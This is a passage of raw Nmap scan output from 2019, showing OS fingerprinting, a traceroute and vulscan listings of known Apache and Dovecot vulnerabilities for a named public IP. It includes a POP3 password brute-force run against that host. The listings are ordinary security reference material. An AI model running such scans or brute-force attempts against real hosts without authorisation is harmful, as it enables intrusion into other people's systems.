17098| [4231] Apache Cocoon Error Page Server Path Disclosure
17099| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
17100| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
17101| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
17102| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
17103| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
17104| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
17105| [3322] mod_php for Apache HTTP Server Process Hijack
17106| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
17107| [2885] Apache mod_python Malformed Query String DoS
17108| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
17109| [2733] Apache HTTP Server mod_rewrite Local Overflow
17110| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
17111| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
17112| [2149] Apache::Gallery Privilege Escalation
17113| [2107] Apache HTTP Server mod_ssl Host: Header XSS
17114| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
17115| [1833] Apache HTTP Server Multiple Slash GET Request DoS
17116| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
17117| [872] Apache Tomcat Multiple Default Accounts
17118| [862] Apache HTTP Server SSI Error Page XSS
17119| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
17120| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
17121| [845] Apache Tomcat MSDOS Device XSS
17122| [844] Apache Tomcat Java Servlet Error Page XSS
17123| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
17124| [838] Apache HTTP Server Chunked Encoding Remote Overflow
17125| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
17126| [775] Apache mod_python Module Importing Privilege Function Execution
17127| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
17128| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
17129| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
17130| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
17131| [637] Apache HTTP Server UserDir Directive Username Enumeration
17132| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
17133| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
17134| [562] Apache HTTP Server mod_info /server-info Information Disclosure
17135| [561] Apache Web Servers mod_status /server-status Information Disclosure
17136| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
17137| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
17138| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
17139| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
17140| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
17141| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
17142| [376] Apache Tomcat contextAdmin Arbitrary File Access
17143| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
17144| [222] Apache HTTP Server test-cgi Arbitrary File Access
17145| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
17146| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
17147|_
17148Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
17149Device type: general purpose
17150Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
17151OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
17152Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (91%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.2 - 4.9 (85%)
17153No exact OS matches for host (test conditions non-ideal).
17154Uptime guess: 25.958 days (since Wed Oct 30 10:20:01 2019)
17155Network Distance: 17 hops
17156TCP Sequence Prediction: Difficulty=257 (Good luck!)
17157IP ID Sequence Generation: All zeros
17158
17159TRACEROUTE (using port 80/tcp)
17160HOP RTT ADDRESS
171611 134.54 ms 10.245.200.1
171622 ...
171633 134.61 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
171644 134.60 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
171655 139.74 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
171666 158.58 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
171677 167.57 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
171688 167.61 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
171699 171.18 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
1717010 163.18 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
1717111 257.46 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
1717212 258.97 ms 204.70.192.125
1717313 255.22 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
1717414 261.27 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
1717515 251.09 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
1717616 253.18 ms 64.89.38.2
1717717 251.56 ms 192.252.144.58
17178
17179NSE: Script Post-scanning.
17180Initiating NSE at 08:19
17181Completed NSE at 08:19, 0.00s elapsed
17182Initiating NSE at 08:19
17183Completed NSE at 08:19, 0.00s elapsed
17184#######################################################################################################################################
17185Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:19 EST
17186Nmap scan report for 192.252.144.58
17187Host is up (0.25s latency).
17188
17189PORT STATE SERVICE VERSION
17190110/tcp open pop3 Dovecot pop3d
17191| pop3-brute:
17192| Accounts: No valid accounts found
17193| Statistics: Performed 25 guesses in 31 seconds, average tps: 0.8
17194|_ ERROR: Failed to connect.
17195|_pop3-capabilities: CAPA STLS TOP RESP-CODES UIDL PIPELINING SASL(PLAIN) USER AUTH-RESP-CODE
17196| vulscan: VulDB - https://vuldb.com:
17197| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
17198| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
17199| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
17200| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
17201| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
17202| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
17203| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
17204| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
17205| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
17206| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
17207| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
17208| [69835] Dovecot 2.2.0/2.2.1 denial of service
17209| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
17210| [65684] Dovecot up to 2.2.6 unknown vulnerability
17211| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
17212| [63692] Dovecot up to 2.0.15 spoofing
17213| [7062] Dovecot 2.1.10 mail-search.c denial of service
17214| [57517] Dovecot up to 2.0.12 Login directory traversal
17215| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
17216| [57515] Dovecot up to 2.0.12 Crash denial of service
17217| [54944] Dovecot up to 1.2.14 denial of service
17218| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
17219| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
17220| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
17221| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
17222| [53277] Dovecot up to 1.2.10 denial of service
17223| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
17224| [45256] Dovecot up to 1.1.5 directory traversal
17225| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
17226| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17227| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17228| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
17229| [40356] Dovecot 1.0.9 Cache unknown vulnerability
17230| [38222] Dovecot 1.0.2 directory traversal
17231| [36376] Dovecot up to 1.0.x directory traversal
17232| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
17233|
17234| MITRE CVE - https://cve.mitre.org:
17235| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
17236| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
17237| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
17238| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
17239| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
17240| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
17241| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
17242| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17243| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17244| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
17245| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
17246| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
17247| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
17248| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
17249| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
17250| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
17251| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
17252| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
17253| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
17254| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
17255| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
17256| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
17257| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
17258| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
17259| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
17260| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
17261| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
17262| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
17263| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
17264| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
17265| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
17266| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
17267| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
17268| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
17269| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
17270| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
17271| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
17272|
17273| SecurityFocus - https://www.securityfocus.com/bid/:
17274| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
17275| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
17276| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
17277| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
17278| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
17279| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
17280| [67306] Dovecot Denial of Service Vulnerability
17281| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
17282| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
17283| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
17284| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17285| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
17286| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
17287| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
17288| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
17289| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
17290| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
17291| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
17292| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
17293| [39838] tpop3d Remote Denial of Service Vulnerability
17294| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
17295| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
17296| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
17297| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
17298| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
17299| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
17300| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
17301| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
17302| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
17303| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
17304| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
17305| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
17306| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
17307| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
17308| [17961] Dovecot Remote Information Disclosure Vulnerability
17309| [16672] Dovecot Double Free Denial of Service Vulnerability
17310| [8495] akpop3d User Name SQL Injection Vulnerability
17311| [8473] Vpop3d Remote Denial Of Service Vulnerability
17312| [3990] ZPop3D Bad Login Logging Failure Vulnerability
17313| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
17314|
17315| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17316| [86382] Dovecot POP3 Service denial of service
17317| [84396] Dovecot IMAP APPEND denial of service
17318| [80453] Dovecot mail-search.c denial of service
17319| [71354] Dovecot SSL Common Name (CN) weak security
17320| [67675] Dovecot script-login security bypass
17321| [67674] Dovecot script-login directory traversal
17322| [67589] Dovecot header name denial of service
17323| [63267] Apple Mac OS X Dovecot information disclosure
17324| [62340] Dovecot mailbox security bypass
17325| [62339] Dovecot IMAP or POP3 denial of service
17326| [62256] Dovecot mailbox security bypass
17327| [62255] Dovecot ACL entry security bypass
17328| [60639] Dovecot ACL plugin weak security
17329| [57267] Apple Mac OS X Dovecot Kerberos security bypass
17330| [56763] Dovecot header denial of service
17331| [54363] Dovecot base_dir privilege escalation
17332| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
17333| [46323] Dovecot dovecot.conf information disclosure
17334| [46227] Dovecot message parsing denial of service
17335| [45669] Dovecot ACL mailbox security bypass
17336| [45667] Dovecot ACL plugin rights security bypass
17337| [41085] Dovecot TAB characters authentication bypass
17338| [41009] Dovecot mail_extra_groups option unauthorized access
17339| [39342] Dovecot LDAP auth cache configuration security bypass
17340| [35767] Dovecot ACL plugin security bypass
17341| [34082] Dovecot mbox-storage.c directory traversal
17342| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
17343| [26578] Cyrus IMAP pop3d buffer overflow
17344| [26536] Dovecot IMAP LIST information disclosure
17345| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
17346| [24709] Dovecot APPEND command denial of service
17347| [13018] akpop3d authentication code SQL injection
17348| [7345] Slackware Linux imapd and ipop3d core dump
17349| [6269] imap, ipop2d and ipop3d buffer overflows
17350| [5923] Linuxconf vpop3d symbolic link
17351| [4918] IPOP3D, Buffer overflow attack
17352| [1560] IPOP3D, user login successful
17353| [1559] IPOP3D user login to remote host successful
17354| [1525] IPOP3D, user logout
17355| [1524] IPOP3D, user auto-logout
17356| [1523] IPOP3D, user login failure
17357| [1522] IPOP3D, brute force attack
17358| [1521] IPOP3D, user kiss of death logout
17359| [418] pop3d mktemp creates insecure temporary files
17360|
17361| Exploit-DB - https://www.exploit-db.com:
17362| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
17363| [23053] Vpop3d Remote Denial of Service Vulnerability
17364| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
17365| [11893] tPop3d 1.5.3 DoS
17366| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
17367| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
17368| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
17369| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
17370|
17371| OpenVAS (Nessus) - http://www.openvas.org:
17372| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
17373| [901025] Dovecot Version Detection
17374| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
17375| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
17376| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
17377| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
17378| [870607] RedHat Update for dovecot RHSA-2011:0600-01
17379| [870471] RedHat Update for dovecot RHSA-2011:1187-01
17380| [870153] RedHat Update for dovecot RHSA-2008:0297-02
17381| [863272] Fedora Update for dovecot FEDORA-2011-7612
17382| [863115] Fedora Update for dovecot FEDORA-2011-7258
17383| [861525] Fedora Update for dovecot FEDORA-2007-664
17384| [861394] Fedora Update for dovecot FEDORA-2007-493
17385| [861333] Fedora Update for dovecot FEDORA-2007-1485
17386| [860845] Fedora Update for dovecot FEDORA-2008-9202
17387| [860663] Fedora Update for dovecot FEDORA-2008-2475
17388| [860169] Fedora Update for dovecot FEDORA-2008-2464
17389| [860089] Fedora Update for dovecot FEDORA-2008-9232
17390| [840950] Ubuntu Update for dovecot USN-1295-1
17391| [840668] Ubuntu Update for dovecot USN-1143-1
17392| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
17393| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
17394| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
17395| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
17396| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
17397| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
17398| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
17399| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
17400| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
17401| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
17402| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
17403| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
17404| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
17405| [70259] FreeBSD Ports: dovecot
17406| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
17407| [66522] FreeBSD Ports: dovecot
17408| [65010] Ubuntu USN-838-1 (dovecot)
17409| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
17410| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
17411| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
17412| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
17413| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
17414| [62854] FreeBSD Ports: dovecot-managesieve
17415| [61916] FreeBSD Ports: dovecot
17416| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
17417| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
17418| [60528] FreeBSD Ports: dovecot
17419| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
17420| [60089] FreeBSD Ports: dovecot
17421| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
17422| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
17423|
17424| SecurityTracker - https://www.securitytracker.com:
17425| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
17426| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
17427| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
17428|
17429| OSVDB - http://www.osvdb.org:
17430| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
17431| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
17432| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17433| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
17434| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
17435| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
17436| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
17437| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
17438| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
17439| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
17440| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
17441| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
17442| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
17443| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
17444| [66113] Dovecot Mail Root Directory Creation Permission Weakness
17445| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
17446| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
17447| [66110] Dovecot Multiple Unspecified Buffer Overflows
17448| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
17449| [64783] Dovecot E-mail Message Header Unspecified DoS
17450| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
17451| [62796] Dovecot mbox Format Email Header Handling DoS
17452| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
17453| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
17454| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
17455| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
17456| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
17457| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
17458| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
17459| [43137] Dovecot mail_extra_groups Symlink File Manipulation
17460| [42979] Dovecot passdbs Argument Injection Authentication Bypass
17461| [39876] Dovecot LDAP Auth Cache Security Bypass
17462| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
17463| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
17464| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
17465| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
17466| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
